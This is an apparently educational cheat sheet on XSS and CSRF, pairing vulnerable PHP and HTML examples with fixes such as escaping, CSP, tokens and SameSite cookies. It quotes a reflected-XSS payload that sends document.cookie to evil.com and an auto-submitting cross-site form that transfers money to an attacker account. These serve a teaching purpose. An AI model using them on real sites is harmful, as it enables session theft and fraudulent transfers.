100% Free Forever
AI-Powered Learning
Industry Expert Content
Certificates & Badges
Learn At Your Own Pace

Web Security Basics (XSS/CSRF) Cheat Sheet

Web Security Basics (XSS/CSRF) Cheat Sheet

Covers cross-site scripting and cross-site request forgery attacks with concrete examples and the defenses that stop them.

2 PagesIntermediateMar 18, 2026

Reflected XSS Example & Fix

An unescaped output vulnerability and three ways to fix it.

html
<!-- VULNERABLE: user input rendered without escaping --><div>Welcome, <?php echo $_GET['name']; ?></div><!-- Attacker URL: ?name=<script>fetch('https://evil.com?c='+document.cookie)</script> --><!-- FIX 1: HTML-escape output --><div>Welcome, <?php echo htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8'); ?></div><!-- FIX 2: Content-Security-Policy header blocks inline script execution --><!-- Content-Security-Policy: default-src 'self'; script-src 'self' --><!-- FIX 3: In React/Vue, avoid dangerouslySetInnerHTML / v-html with untrusted input -->

CSRF Attack & Token Defense

An auto-submitting cross-site form and the token that stops it.

html
<!-- Attacker's page auto-submits a form to your bank while the user is logged in --><form action="https://bank.com/transfer" method="POST" id="csrf">  <input type="hidden" name="to" value="attacker-account">  <input type="hidden" name="amount" value="10000"></form><script>document.getElementById('csrf').submit();</script><!-- DEFENSE: server includes a per-session CSRF token the attacker can't guess --><form action="/transfer" method="POST">  <input type="hidden" name="csrf_token" value="{{ csrfToken }}">  ...</form><!-- Server rejects the request unless the submitted token matches the session's token -->

XSS Defense Techniques

Layered mitigations against script injection.

  • Output encoding- Escape user data based on context (HTML, attribute, JS, URL) before rendering
  • Content-Security-Policy- CSP header restricts which scripts/styles can execute, blocking inline injections
  • Input validation- Whitelist expected formats server-side; never trust client-side validation alone
  • HttpOnly cookies- Prevents document.cookie from exposing session cookies to injected scripts
  • Sanitize rich text- Use a library like DOMPurify when you must render user-supplied HTML
  • Avoid innerHTML/eval- Use textContent or framework-safe binding with untrusted data instead

CSRF Defense Techniques

Ways to stop forged cross-site requests.

  • Synchronizer token pattern- Unique, unpredictable token embedded in forms and verified per request
  • SameSite cookies- Set-Cookie: SameSite=Lax or Strict blocks cookies on cross-site requests
  • Double-submit cookie- Token sent both as a cookie and a header/body field; server compares them
  • Custom request headers- Requiring X-Requested-With on AJAX calls, which cross-origin forms can't set
  • Re-authentication- Require password/2FA confirmation for high-value actions like changing email
Pro Tip

SameSite=Lax cookies (the modern browser default) block most CSRF on top-level navigation, but they don't stop it on same-site subdomains or non-GET requests triggered another way — still implement CSRF tokens on any endpoint that mutates data.

Was this cheat sheet helpful?

Explore Topics

#WebSecurityBasicsXSSCSRF#WebSecurityBasicsXSSCSRFCheatSheet#WebDevelopment#Intermediate#Reflected#XSS#Example#Fix#Security#CommandLine#CheatSheet#SkillVeris
Advertisement
Sri Hayavadhana Info-Tech

Professional Web Designing Services

  • Responsive Websites
  • E-commerce Solutions
  • SEO Friendly Design
  • Fast & Secure
  • Support & Maintenance
Get a Free Quote

Share this Cheat Sheet